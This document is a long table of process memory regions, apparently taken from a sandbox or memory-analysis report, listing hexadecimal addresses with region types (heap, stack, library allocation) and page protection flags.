1D99EEEC000
|
heap
|
page read and write
|
||
20025D9C000
|
heap
|
page read and write
|
||
207DD4D8000
|
heap
|
page read and write
|
||
14630B13000
|
heap
|
page read and write
|
||
B90000
|
unkown
|
page readonly
|
||
1D99E84D000
|
heap
|
page read and write
|
||
EF1000
|
stack
|
page read and write
|
||
1DA65EC8000
|
trusted library allocation
|
page read and write
|
||
247BF479000
|
trusted library allocation
|
page read and write
|
||
1D475C2E000
|
trusted library allocation
|
page read and write
|
||
7FF848D00000
|
trusted library allocation
|
page read and write
|
||
14635854000
|
heap
|
page read and write
|
||
201AAFC2000
|
heap
|
page read and write
|
||
1C471000
|
heap
|
page read and write
|
||
1C9724E8000
|
heap
|
page read and write
|
||
7FF848CC0000
|
trusted library allocation
|
page read and write
|
||
F7E9DFC000
|
stack
|
page read and write
|
||
9CA8392000
|
stack
|
page read and write
|
||
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
2EF907E000
|
unkown
|
page readonly
|
||
5305000
|
trusted library allocation
|
page read and write
|
||
F7EAEFA000
|
stack
|
page read and write
|
||
1D99E770000
|
heap
|
page read and write
|
||
1E9E42B3000
|
heap
|
page read and write
|
||
14635720000
|
trusted library allocation
|
page read and write
|
||
207DD7AC000
|
unkown
|
page readonly
|
||
146358C8000
|
heap
|
page read and write
|
||
F7ED6FD000
|
stack
|
page read and write
|
||
9CA877E000
|
stack
|
page read and write
|
||
207E0203000
|
heap
|
page read and write
|
||
207DE36A000
|
heap
|
page read and write
|
||
1D99EA85000
|
heap
|
page read and write
|
||
207DC9C0000
|
trusted library allocation
|
page read and write
|
||
146302BD000
|
heap
|
page read and write
|
||
1E9E6495000
|
heap
|
page read and write
|
||
1D47DEE7000
|
heap
|
page read and write
|
||
20027D45000
|
trusted library allocation
|
page read and write
|
||
C10000
|
heap
|
page read and write
|
||
207DC646000
|
unkown
|
page readonly
|
||
2003E260000
|
heap
|
page read and write
|
||
1DA7D11E000
|
heap
|
page read and write
|
||
1AC8E64E000
|
trusted library allocation
|
page read and write
|
||
7FF848BC6000
|
trusted library allocation
|
page read and write
|
||
F7EC8F7000
|
stack
|
page read and write
|
||
766000
|
unkown
|
page readonly
|
||
207DE3D5000
|
heap
|
page read and write
|
||
201AAFB0000
|
heap
|
page read and write
|
||
207DEF9D000
|
heap
|
page read and write
|
||
7FF848BC0000
|
trusted library allocation
|
page read and write
|
||
1D466538000
|
trusted library allocation
|
page read and write
|
||
1C9742E0000
|
heap
|
page read and write
|
||
207DE540000
|
trusted library allocation
|
page read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
7FF848B44000
|
trusted library allocation
|
page read and write
|
||
201ADDAA000
|
trusted library allocation
|
page read and write
|
||
1D99E895000
|
heap
|
page read and write
|
||
2EF7D7E000
|
unkown
|
page readonly
|
||
7FF848BD0000
|
trusted library allocation
|
page read and write
|
||
207E0445000
|
heap
|
page read and write
|
||
207D0DC1000
|
heap
|
page read and write
|
||
207DE326000
|
heap
|
page read and write
|
||
7FF848B6C000
|
trusted library allocation
|
page execute and read and write
|
||
207DD806000
|
unkown
|
page readonly
|
||
1D465773000
|
heap
|
page read and write
|
||
5460000
|
trusted library allocation
|
page read and write
|
||
1C97252B000
|
heap
|
page read and write
|
||
1E9E20FB000
|
heap
|
page read and write
|
||
207DEFD1000
|
heap
|
page read and write
|
||
1B4D0000
|
heap
|
page read and write
|
||
207DCF02000
|
heap
|
page read and write
|
||
1D99F041000
|
heap
|
page read and write
|
||
207E0294000
|
heap
|
page read and write
|
||
7FF848B10000
|
trusted library allocation
|
page read and write
|
||
201AE3F4000
|
trusted library allocation
|
page read and write
|
||
1D99E89F000
|
heap
|
page read and write
|
||
52F4000
|
trusted library allocation
|
page read and write
|
||
1B5EE000
|
stack
|
page read and write
|
||
207E01B4000
|
heap
|
page read and write
|
||
207DD7A0000
|
unkown
|
page read and write
|
||
7FF848D60000
|
trusted library allocation
|
page execute and read and write
|
||
107B000
|
heap
|
page read and write
|
||
1D99EA58000
|
heap
|
page read and write
|
||
1D99E828000
|
heap
|
page read and write
|
||
C83000
|
heap
|
page read and write
|
||
207DA980000
|
trusted library allocation
|
page read and write
|
||
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
207DE572000
|
unkown
|
page execute read
|
||
20025CA6000
|
heap
|
page execute and read and write
|
||
201C4F6A000
|
heap
|
page read and write
|
||
207DCFED000
|
heap
|
page read and write
|
||
207D0C13000
|
heap
|
page read and write
|
||
1D99EECA000
|
heap
|
page read and write
|
||
9E9000
|
heap
|
page read and write
|
||
7FF848D34000
|
trusted library allocation
|
page read and write
|
||
1C41A000
|
heap
|
page read and write
|
||
207DC37D000
|
trusted library allocation
|
page read and write
|
||
201C5220000
|
heap
|
page read and write
|
||
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
20026972000
|
trusted library allocation
|
page read and write
|
||
1D475C34000
|
trusted library allocation
|
page read and write
|
||
247D7D10000
|
heap
|
page execute and read and write
|
||
207E0200000
|
heap
|
page read and write
|
||
7FF848C50000
|
trusted library allocation
|
page execute and read and write
|
||
1D475C3C000
|
trusted library allocation
|
page read and write
|
||
207DCDD0000
|
heap
|
page read and write
|
||
201C4FDE000
|
heap
|
page read and write
|
||
1D99E990000
|
heap
|
page read and write
|
||
F7EA0FF000
|
stack
|
page read and write
|
||
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
7FF848B13000
|
trusted library allocation
|
page execute and read and write
|
||
204B6C9000
|
stack
|
page read and write
|
||
207DD680000
|
trusted library allocation
|
page read and write
|
||
20026E9A000
|
trusted library allocation
|
page read and write
|
||
1D99EEBA000
|
heap
|
page read and write
|
||
210D3B40000
|
heap
|
page read and write
|
||
1D4671AD000
|
trusted library allocation
|
page read and write
|
||
1D99EA06000
|
heap
|
page read and write
|
||
F7EABFA000
|
stack
|
page read and write
|
||
1D99F0A4000
|
heap
|
page read and write
|
||
1DA6307D000
|
heap
|
page read and write
|
||
1AC8E62A000
|
trusted library allocation
|
page read and write
|
||
26B1000
|
trusted library allocation
|
page read and write
|
||
2003E7D0000
|
heap
|
page read and write
|
||
BAB5DFD000
|
stack
|
page read and write
|
||
207D5D66000
|
heap
|
page read and write
|
||
207D31C3000
|
heap
|
page read and write
|
||
5B6F18E000
|
stack
|
page read and write
|
||
207DC330000
|
trusted library allocation
|
page read and write
|
||
2EF867B000
|
stack
|
page read and write
|
||
7FF848B2D000
|
trusted library allocation
|
page execute and read and write
|
||
1D99EA62000
|
heap
|
page read and write
|
||
7FF848CBA000
|
trusted library allocation
|
page read and write
|
||
1BACE000
|
stack
|
page read and write
|
||
1E9E3FE0000
|
trusted library allocation
|
page read and write
|
||
A0F000
|
heap
|
page read and write
|
||
207DC710000
|
trusted library allocation
|
page read and write
|
||
210D3E10000
|
heap
|
page read and write
|
||
201ACFCD000
|
trusted library allocation
|
page read and write
|
||
207DC7CE000
|
unkown
|
page read and write
|
||
207DE590000
|
trusted library allocation
|
page read and write
|
||
7FF848B50000
|
trusted library allocation
|
page read and write
|
||
5B6E5B9000
|
stack
|
page read and write
|
||
1240000
|
heap
|
page read and write
|
||
207DDF90000
|
heap
|
page read and write
|
||
207DEF90000
|
heap
|
page read and write
|
||
C85000
|
heap
|
page read and write
|
||
1D99E88B000
|
heap
|
page read and write
|
||
207E04B8000
|
heap
|
page read and write
|
||
7FF848BBC000
|
trusted library allocation
|
page execute and read and write
|
||
FE5000
|
heap
|
page read and write
|
||
1C97254B000
|
heap
|
page read and write
|
||
1D47DD1F000
|
heap
|
page read and write
|
||
207E0302000
|
heap
|
page read and write
|
||
1D99E9F3000
|
heap
|
page read and write
|
||
20024390000
|
heap
|
page read and write
|
||
12E3D000
|
trusted library allocation
|
page read and write
|
||
2691000
|
trusted library allocation
|
page read and write
|
||
1D99E7D0000
|
heap
|
page read and write
|
||
222345FE000
|
heap
|
page read and write
|
||
1DA65BBD000
|
trusted library allocation
|
page read and write
|
||
207DE313000
|
heap
|
page read and write
|
||
D142A79000
|
stack
|
page read and write
|
||
2003E7B3000
|
heap
|
page read and write
|
||
207DEC1E000
|
unkown
|
page readonly
|
||
207DD5EF000
|
heap
|
page read and write
|
||
B11000
|
stack
|
page read and write
|
||
21EF5D5000
|
stack
|
page read and write
|
||
1C396000
|
heap
|
page read and write
|
||
1D466A69000
|
trusted library allocation
|
page read and write
|
||
207D5D32000
|
heap
|
page read and write
|
||
1D47DDC7000
|
heap
|
page read and write
|
||
1D99EE41000
|
heap
|
page read and write
|
||
200242E0000
|
heap
|
page read and write
|
||
207DE362000
|
heap
|
page read and write
|
||
7FF848C40000
|
trusted library allocation
|
page execute and read and write
|
||
1E9E20BB000
|
heap
|
page read and write
|
||
207D31DD000
|
heap
|
page read and write
|
||
12A92000
|
trusted library allocation
|
page read and write
|
||
2BF9CE9F000
|
heap
|
page read and write
|
||
207DE3D7000
|
heap
|
page read and write
|
||
207E0462000
|
heap
|
page read and write
|
||
1D99E9F4000
|
heap
|
page read and write
|
||
1D99EE40000
|
heap
|
page read and write
|
||
207D5AC8000
|
trusted library allocation
|
page read and write
|
||
1D99F0C6000
|
heap
|
page read and write
|
||
2EF997E000
|
unkown
|
page readonly
|
||
201C5110000
|
heap
|
page execute and read and write
|
||
1D467746000
|
trusted library allocation
|
page read and write
|
||
7FF848BDC000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
1D99F050000
|
heap
|
page read and write
|
||
1D47DCE2000
|
heap
|
page read and write
|
||
294F000
|
trusted library allocation
|
page read and write
|
||
207D0CBE000
|
heap
|
page read and write
|
||
207DDC26000
|
heap
|
page read and write
|
||
7FF848AF0000
|
trusted library allocation
|
page read and write
|
||
5B6DDF3000
|
stack
|
page read and write
|
||
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
1BFE4000
|
heap
|
page read and write
|
||
7FF848B33000
|
trusted library allocation
|
page execute and read and write
|
||
247BD99E000
|
heap
|
page read and write
|
||
1D99EA28000
|
heap
|
page read and write
|
||
F7E98FE000
|
stack
|
page read and write
|
||
200243AE000
|
heap
|
page read and write
|
||
1AC8E63E000
|
trusted library allocation
|
page read and write
|
||
200243D6000
|
heap
|
page read and write
|
||
207DCFC7000
|
heap
|
page read and write
|
||
7FF6373EB000
|
unkown
|
page read and write
|
||
1D463E14000
|
heap
|
page read and write
|
||
1B8CE000
|
stack
|
page read and write
|
||
4AE3000
|
trusted library allocation
|
page read and write
|
||
14635810000
|
trusted library allocation
|
page read and write
|
||
9CA994D000
|
stack
|
page read and write
|
||
12E11000
|
trusted library allocation
|
page read and write
|
||
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
1DA7D0AC000
|
heap
|
page read and write
|
||
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
1DA63340000
|
trusted library allocation
|
page read and write
|
||
1E9E3DE0000
|
heap
|
page read and write
|
||
1E9E211E000
|
heap
|
page read and write
|
||
C4BEEFE000
|
stack
|
page read and write
|
||
207D0DCF000
|
heap
|
page read and write
|
||
5B6E07E000
|
stack
|
page read and write
|
||
1D99E864000
|
heap
|
page read and write
|
||
1D99EFF0000
|
heap
|
page read and write
|
||
207DD8F0000
|
trusted library allocation
|
page read and write
|
||
1DA7D320000
|
heap
|
page read and write
|
||
207DE584000
|
unkown
|
page execute read
|
||
1D47DCB8000
|
heap
|
page read and write
|
||
2EF92FE000
|
stack
|
page read and write
|
||
1D99EF77000
|
heap
|
page read and write
|
||
9CA87F9000
|
stack
|
page read and write
|
||
7FF848B2A000
|
trusted library allocation
|
page read and write
|
||
1E9E4232000
|
heap
|
page read and write
|
||
1C41C000
|
heap
|
page read and write
|
||
22234679000
|
heap
|
page read and write
|
||
207DEF82000
|
heap
|
page read and write
|
||
F7ED0F8000
|
stack
|
page read and write
|
||
207DEC10000
|
unkown
|
page readonly
|
||
780000
|
heap
|
page read and write
|
||
1D4656D0000
|
heap
|
page execute and read and write
|
||
207D5D7C000
|
heap
|
page read and write
|
||
207D3100000
|
heap
|
page read and write
|
||
E29000
|
heap
|
page read and write
|
||
207DE2A2000
|
heap
|
page read and write
|
||
207DD8F0000
|
trusted library allocation
|
page read and write
|
||
207DC6A8000
|
unkown
|
page readonly
|
||
207DC6C0000
|
trusted library allocation
|
page read and write
|
||
207DC37E000
|
trusted library allocation
|
page read and write
|
||
20027D00000
|
trusted library allocation
|
page read and write
|
||
2BF9CD80000
|
unkown
|
page readonly
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
207DC7CC000
|
unkown
|
page readonly
|
||
F7ED8FF000
|
stack
|
page read and write
|
||
1DA63055000
|
heap
|
page read and write
|
||
200263ED000
|
trusted library allocation
|
page read and write
|
||
207E0343000
|
heap
|
page read and write
|
||
7FF848D50000
|
trusted library allocation
|
page read and write
|
||
1D99E807000
|
heap
|
page read and write
|
||
7FF848B24000
|
trusted library allocation
|
page read and write
|
||
1E9E212A000
|
heap
|
page read and write
|
||
1D47E008000
|
heap
|
page read and write
|
||
1E9E20C2000
|
heap
|
page read and write
|
||
207D5E00000
|
trusted library section
|
page readonly
|
||
7FF848B12000
|
trusted library allocation
|
page read and write
|
||
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
14630B1B000
|
heap
|
page read and write
|
||
532D000
|
trusted library allocation
|
page read and write
|
||
1D99EFDF000
|
heap
|
page read and write
|
||
1AC8E6C4000
|
trusted library allocation
|
page read and write
|
||
BAB57FE000
|
stack
|
page read and write
|
||
1D99E89C000
|
heap
|
page read and write
|
||
204B64E000
|
stack
|
page read and write
|
||
C4BF7FE000
|
stack
|
page read and write
|
||
1D99EE96000
|
heap
|
page read and write
|
||
1DA63077000
|
heap
|
page read and write
|
||
207DE155000
|
heap
|
page read and write
|
||
4F4573C000
|
stack
|
page read and write
|
||
201AB184000
|
heap
|
page read and write
|
||
9CA984E000
|
stack
|
page read and write
|
||
2EF807C000
|
stack
|
page read and write
|
||
251E000
|
stack
|
page read and write
|
||
7DF462770000
|
trusted library allocation
|
page execute and read and write
|
||
1E9E20DF000
|
heap
|
page read and write
|
||
9C6F5FB000
|
stack
|
page read and write
|
||
207DD76A000
|
unkown
|
page readonly
|
||
207DDFD0000
|
heap
|
page read and write
|
||
1DA7D214000
|
heap
|
page read and write
|
||
7FF848D10000
|
trusted library allocation
|
page read and write
|
||
207DCA72000
|
heap
|
page read and write
|
||
1DA7D12E000
|
heap
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
1D99EF66000
|
heap
|
page read and write
|
||
20026B1D000
|
trusted library allocation
|
page read and write
|
||
1D99E89F000
|
heap
|
page read and write
|
||
1C46E000
|
heap
|
page read and write
|
||
2003E650000
|
heap
|
page read and write
|
||
222345DA000
|
heap
|
page read and write
|
||
207DDD23000
|
heap
|
page read and write
|
||
201AE36B000
|
trusted library allocation
|
page read and write
|
||
7FF848C30000
|
trusted library allocation
|
page execute and read and write
|
||
ED0000
|
trusted library allocation
|
page read and write
|
||
F35000
|
heap
|
page read and write
|
||
2003E77C000
|
heap
|
page read and write
|
||
207DEEA3000
|
heap
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
1D99E89F000
|
heap
|
page read and write
|
||
1D99EF22000
|
heap
|
page read and write
|
||
207D0DAA000
|
heap
|
page read and write
|
||
2002438E000
|
heap
|
page read and write
|
||
200277B8000
|
trusted library allocation
|
page read and write
|
||
1C972531000
|
heap
|
page read and write
|
||
207D3153000
|
heap
|
page read and write
|
||
5395000
|
trusted library allocation
|
page read and write
|
||
201AB0B0000
|
heap
|
page read and write
|
||
207DCBA5000
|
heap
|
page read and write
|
||
1463590E000
|
heap
|
page read and write
|
||
1D99E80D000
|
heap
|
page read and write
|
||
BE0000
|
trusted library allocation
|
page read and write
|
||
9E8000
|
heap
|
page read and write
|
||
1E9E40EE000
|
heap
|
page read and write
|
||
7FF848B14000
|
trusted library allocation
|
page read and write
|
||
7FF848B12000
|
trusted library allocation
|
page read and write
|
||
1D99E9E1000
|
heap
|
page read and write
|
||
1AC8C9D0000
|
heap
|
page read and write
|
||
1D99E8A6000
|
heap
|
page read and write
|
||
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
201C523C000
|
heap
|
page read and write
|
||
1D99E89F000
|
heap
|
page read and write
|
||
21EF5D0000
|
stack
|
page read and write
|
||
1DA632C0000
|
trusted library allocation
|
page read and write
|
||
207D26C0000
|
trusted library allocation
|
page read and write
|
||
1E9E6495000
|
heap
|
page read and write
|
||
C4BF1FC000
|
stack
|
page read and write
|
||
7FF848B10000
|
trusted library allocation
|
page read and write
|
||
A73000
|
heap
|
page read and write
|
||
207DE22C000
|
heap
|
page read and write
|
||
207DE3C9000
|
heap
|
page read and write
|
||
7FF848CD4000
|
trusted library allocation
|
page read and write
|
||
2BF9CE60000
|
heap
|
page read and write
|
||
1DA7D4A0000
|
heap
|
page read and write
|
||
268F000
|
stack
|
page read and write
|
||
1E5E4000
|
heap
|
page read and write
|
||
7FF848BD0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
1D99EF65000
|
heap
|
page read and write
|
||
F7EBCFD000
|
stack
|
page read and write
|
||
207D5AA0000
|
trusted library allocation
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
1D99EA61000
|
heap
|
page read and write
|
||
1E9E2265000
|
heap
|
page read and write
|
||
207DC620000
|
unkown
|
page readonly
|
||
F7EC0FB000
|
stack
|
page read and write
|
||
14635A00000
|
trusted library allocation
|
page read and write
|
||
7FF848E69000
|
trusted library allocation
|
page read and write
|
||
207DCF02000
|
heap
|
page read and write
|
||
52D3000
|
trusted library allocation
|
page read and write
|
||
247BF491000
|
trusted library allocation
|
page read and write
|
||
207E0023000
|
heap
|
page read and write
|
||
E20000
|
heap
|
page read and write
|
||
F7EB1FD000
|
stack
|
page read and write
|
||
207E04CA000
|
heap
|
page read and write
|
||
2930000
|
heap
|
page read and write
|
||
14630240000
|
heap
|
page read and write
|
||
207E0202000
|
heap
|
page read and write
|
||
D079F79000
|
stack
|
page read and write
|
||
207DDC34000
|
heap
|
page read and write
|
||
146312A0000
|
trusted library section
|
page readonly
|
||
C60000
|
heap
|
page read and write
|
||
14635780000
|
trusted library allocation
|
page read and write
|
||
201C527E000
|
heap
|
page read and write
|
||
1DA74E7E000
|
trusted library allocation
|
page read and write
|
||
1D99F0D8000
|
heap
|
page read and write
|
||
207DD804000
|
unkown
|
page read and write
|
||
1C9725B9000
|
heap
|
page read and write
|
||
7FF848B5C000
|
trusted library allocation
|
page execute and read and write
|
||
1DA65BC5000
|
trusted library allocation
|
page read and write
|
||
981E9FE000
|
stack
|
page read and write
|
||
207E0212000
|
heap
|
page read and write
|
||
1D99EEFE000
|
heap
|
page read and write
|
||
1C972527000
|
heap
|
page read and write
|
||
207DCCF0000
|
heap
|
page read and write
|
||
BAB59FF000
|
stack
|
page read and write
|
||
1B460000
|
trusted library section
|
page read and write
|
||
7FF848E72000
|
trusted library allocation
|
page read and write
|
||
7FF848BDC000
|
trusted library allocation
|
page execute and read and write
|
||
204A47E000
|
stack
|
page read and write
|
||
21EF8FE000
|
stack
|
page read and write
|
||
207DE26A000
|
heap
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
1C97254F000
|
heap
|
page read and write
|
||
1DA65C52000
|
trusted library allocation
|
page read and write
|
||
207DD49D000
|
heap
|
page read and write
|
||
7FF848B14000
|
trusted library allocation
|
page read and write
|
||
2BF9D220000
|
heap
|
page read and write
|
||
204A1CE000
|
stack
|
page read and write
|
||
201AE391000
|
trusted library allocation
|
page read and write
|
||
1D99E9A2000
|
heap
|
page read and write
|
||
7FF848CDA000
|
trusted library allocation
|
page read and write
|
||
1DA7D160000
|
heap
|
page read and write
|
||
2BF9CD86000
|
unkown
|
page readonly
|
||
7FF848B24000
|
trusted library allocation
|
page read and write
|
||
2DBC000
|
trusted library allocation
|
page read and write
|
||
2EF847B000
|
stack
|
page read and write
|
||
207E04C0000
|
heap
|
page read and write
|
||
12E18000
|
trusted library allocation
|
page read and write
|
||
1D46776B000
|
trusted library allocation
|
page read and write
|
||
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
1D99EF89000
|
heap
|
page read and write
|
||
207DD7F6000
|
unkown
|
page write copy
|
||
22236014000
|
heap
|
page read and write
|
||
1DA4B000
|
stack
|
page read and write
|
||
201C52F5000
|
heap
|
page read and write
|
||
1D99E9D5000
|
heap
|
page read and write
|
||
1C379000
|
heap
|
page read and write
|
||
2941000
|
trusted library allocation
|
page read and write
|
||
EC0000
|
heap
|
page read and write
|
||
1D99F081000
|
heap
|
page read and write
|
||
1D99EA06000
|
heap
|
page read and write
|
||
1E9E211A000
|
heap
|
page read and write
|
||
1D47DD4A000
|
heap
|
page read and write
|
||
12E0F000
|
trusted library allocation
|
page read and write
|
||
22234679000
|
heap
|
page read and write
|
||
247BD6F0000
|
unkown
|
page readonly
|
||
5464000
|
trusted library allocation
|
page read and write
|
||
207DE3EA000
|
heap
|
page read and write
|
||
1DA65BED000
|
trusted library allocation
|
page read and write
|
||
1D99EEEE000
|
heap
|
page read and write
|
||
1D737000
|
stack
|
page read and write
|
||
1D475CEA000
|
trusted library allocation
|
page read and write
|
||
F7EA7FB000
|
stack
|
page read and write
|
||
2BFAEB47000
|
trusted library allocation
|
page read and write
|
||
FA0000
|
heap
|
page read and write
|
||
2850000
|
heap
|
page read and write
|
||
207DE700000
|
heap
|
page read and write
|
||
20027D4A000
|
trusted library allocation
|
page read and write
|
||
1D99EA60000
|
heap
|
page read and write
|
||
200243D4000
|
heap
|
page read and write
|
||
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
7FF848B2D000
|
trusted library allocation
|
page execute and read and write
|
||
1D467766000
|
trusted library allocation
|
page read and write
|
||
2BF9CECC000
|
heap
|
page read and write
|
||
7FF848D10000
|
trusted library allocation
|
page read and write
|
||
ECF000
|
stack
|
page read and write
|
||
207DCC72000
|
unkown
|
page readonly
|
||
1D4659C7000
|
trusted library allocation
|
page read and write
|
||
207DDC03000
|
heap
|
page read and write
|
||
5B6E7BB000
|
stack
|
page read and write
|
||
207D31AA000
|
heap
|
page read and write
|
||
207DCAA6000
|
heap
|
page read and write
|
||
207DD660000
|
trusted library allocation
|
page read and write
|
||
207DEF00000
|
heap
|
page read and write
|
||
1DA7D32B000
|
heap
|
page read and write
|
||
5397000
|
trusted library allocation
|
page read and write
|
||
146356A0000
|
trusted library allocation
|
page read and write
|
||
201AAFFC000
|
heap
|
page read and write
|
||
207D0B90000
|
heap
|
page read and write
|
||
207DD8A0000
|
unkown
|
page readonly
|
||
207D5D2A000
|
heap
|
page read and write
|
||
7FF848D04000
|
trusted library allocation
|
page read and write
|
||
146358E8000
|
heap
|
page read and write
|
||
7DF423721000
|
trusted library allocation
|
page execute read
|
||
207E0402000
|
heap
|
page read and write
|
||
4F44CFE000
|
stack
|
page read and write
|
||
1DA633A0000
|
heap
|
page read and write
|
||
1AC8E560000
|
trusted library allocation
|
page read and write
|
||
7FF848BC6000
|
trusted library allocation
|
page read and write
|
||
7FF848D00000
|
trusted library allocation
|
page read and write
|
||
1DA65BC3000
|
trusted library allocation
|
page read and write
|
||
201BCB31000
|
trusted library allocation
|
page read and write
|
||
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
247BF4DE000
|
trusted library allocation
|
page read and write
|
||
7FF848BD0000
|
trusted library allocation
|
page execute and read and write
|
||
2690000
|
heap
|
page execute and read and write
|
||
14630222000
|
heap
|
page read and write
|
||
1D99EF9A000
|
heap
|
page read and write
|
||
2003E7A7000
|
heap
|
page read and write
|
||
207D0C4D000
|
heap
|
page read and write
|
||
7FF848BE0000
|
trusted library allocation
|
page execute and read and write
|
||
1D99EFCE000
|
heap
|
page read and write
|
||
207DD7F0000
|
trusted library allocation
|
page read and write
|
||
7FF848CC0000
|
trusted library allocation
|
page execute and read and write
|
||
4D84000
|
trusted library allocation
|
page read and write
|
||
20027874000
|
trusted library allocation
|
page read and write
|
||
207DCF3E000
|
heap
|
page read and write
|
||
1C974631000
|
heap
|
page read and write
|
||
1AC8CA60000
|
heap
|
page read and write
|
||
207DCB28000
|
heap
|
page read and write
|
||
14630B02000
|
heap
|
page read and write
|
||
1D465B69000
|
trusted library allocation
|
page read and write
|
||
A47000
|
heap
|
page read and write
|
||
1B43E000
|
stack
|
page read and write
|
||
146312C0000
|
trusted library section
|
page readonly
|
||
1D463CFB000
|
heap
|
page read and write
|
||
7FF848B24000
|
trusted library allocation
|
page read and write
|
||
7FF637391000
|
unkown
|
page execute read
|
||
12A71000
|
trusted library allocation
|
page read and write
|
||
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
207DCF5E000
|
heap
|
page read and write
|
||
1D99EA85000
|
heap
|
page read and write
|
||
1D99EF54000
|
heap
|
page read and write
|
||
1C97255B000
|
heap
|
page read and write
|
||
207DD8F0000
|
trusted library allocation
|
page read and write
|
||
1AC8CBE0000
|
heap
|
page read and write
|
||
F7EC4FA000
|
stack
|
page read and write
|
||
1D99EFBC000
|
heap
|
page read and write
|
||
5393000
|
trusted library allocation
|
page read and write
|
||
207DCF95000
|
heap
|
page read and write
|
||
CC5000
|
heap
|
page read and write
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
F7EB3FE000
|
stack
|
page read and write
|
||
7FF848E43000
|
trusted library allocation
|
page read and write
|
||
1D99E89F000
|
heap
|
page read and write
|
||
207E01A4000
|
heap
|
page read and write
|
||
1DA66A25000
|
trusted library allocation
|
page read and write
|
||
1E9E6495000
|
heap
|
page read and write
|
||
1D466972000
|
trusted library allocation
|
page read and write
|
||
1D463C50000
|
heap
|
page read and write
|
||
7FF848BC0000
|
trusted library allocation
|
page read and write
|
||
1DA63304000
|
heap
|
page read and write
|
||
1B704000
|
heap
|
page read and write
|
||
207DE3D5000
|
heap
|
page read and write
|
||
2A71000
|
trusted library allocation
|
page read and write
|
||
207DE16A000
|
heap
|
page read and write
|
||
1D99F060000
|
heap
|
page read and write
|
||
222345E6000
|
heap
|
page read and write
|
||
7FF848B34000
|
trusted library allocation
|
page read and write
|
||
207DC62A000
|
unkown
|
page readonly
|
||
1D99EA06000
|
heap
|
page read and write
|
||
146356D0000
|
trusted library allocation
|
page read and write
|
||
5365000
|
trusted library allocation
|
page read and write
|
||
207DDFE0000
|
heap
|
page read and write
|
||
53CC000
|
trusted library allocation
|
page read and write
|
||
7FF848E88000
|
trusted library allocation
|
page read and write
|
||
7DF4AA8C0000
|
trusted library allocation
|
page execute and read and write
|
||
D07A17E000
|
stack
|
page read and write
|
||
7FF848CC1000
|
trusted library allocation
|
page read and write
|
||
7FF848E74000
|
trusted library allocation
|
page read and write
|
||
1D99EA17000
|
heap
|
page read and write
|
||
1E9E20AB000
|
heap
|
page read and write
|
||
1D463CED000
|
heap
|
page read and write
|
||
207DEE47000
|
heap
|
page read and write
|
||
EC5000
|
heap
|
page read and write
|
||
BAB66FC000
|
stack
|
page read and write
|
||
9C6ECFF000
|
stack
|
page read and write
|
||
207DC9F0000
|
trusted library allocation
|
page read and write
|
||
2002704F000
|
trusted library allocation
|
page read and write
|
||
FEF000
|
heap
|
page read and write
|
||
207DCCA0000
|
trusted library allocation
|
page read and write
|
||
C68000
|
heap
|
page read and write
|
||
14635905000
|
heap
|
page read and write
|
||
247BD890000
|
heap
|
page read and write
|
||
11A0000
|
trusted library allocation
|
page read and write
|
||
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
7FF848CC6000
|
trusted library allocation
|
page read and write
|
||
9D7000
|
heap
|
page read and write
|
||
1D99E7E6000
|
heap
|
page read and write
|
||
7FF848E33000
|
trusted library allocation
|
page read and write
|
||
207DE761000
|
heap
|
page read and write
|
||
207DE3EF000
|
heap
|
page read and write
|
||
2BF9CF1B000
|
heap
|
page read and write
|
||
1DA6648C000
|
trusted library allocation
|
page read and write
|
||
1D99EE75000
|
heap
|
page read and write
|
||
207DCDE0000
|
trusted library allocation
|
page read and write
|
||
AA7000
|
heap
|
page read and write
|
||
7FF848D50000
|
trusted library allocation
|
page read and write
|
||
1B9CF000
|
stack
|
page read and write
|
||
7FF848BCC000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848BD6000
|
trusted library allocation
|
page execute and read and write
|
||
207DD792000
|
unkown
|
page readonly
|
||
1D99E7C1000
|
heap
|
page read and write
|
||
1D99E895000
|
heap
|
page read and write
|
||
7FF6373FF000
|
unkown
|
page readonly
|
||
C4BF3FA000
|
stack
|
page read and write
|
||
201ADCDC000
|
trusted library allocation
|
page read and write
|
||
1E9E6351000
|
heap
|
page read and write
|
||
3EC9000
|
trusted library allocation
|
page read and write
|
||
2003E28B000
|
heap
|
page read and write
|
||
269C000
|
trusted library allocation
|
page read and write
|
||
20025F10000
|
heap
|
page execute and read and write
|
||
7FF789DB0000
|
unkown
|
page readonly
|
||
51F9000
|
trusted library allocation
|
page read and write
|
||
5333000
|
trusted library allocation
|
page read and write
|
||
7FF848D00000
|
trusted library allocation
|
page read and write
|
||
207DEF9D000
|
heap
|
page read and write
|
||
20026E85000
|
trusted library allocation
|
page read and write
|
||
20025C50000
|
trusted library allocation
|
page read and write
|
||
207DCCA0000
|
unkown
|
page readonly
|
||
207E007D000
|
heap
|
page read and write
|
||
207D0DE7000
|
heap
|
page read and write
|
||
207DEF02000
|
heap
|
page read and write
|
||
7FF848CE0000
|
trusted library allocation
|
page execute and read and write
|
||
C0B000
|
heap
|
page read and write
|
||
1D99EA7E000
|
heap
|
page read and write
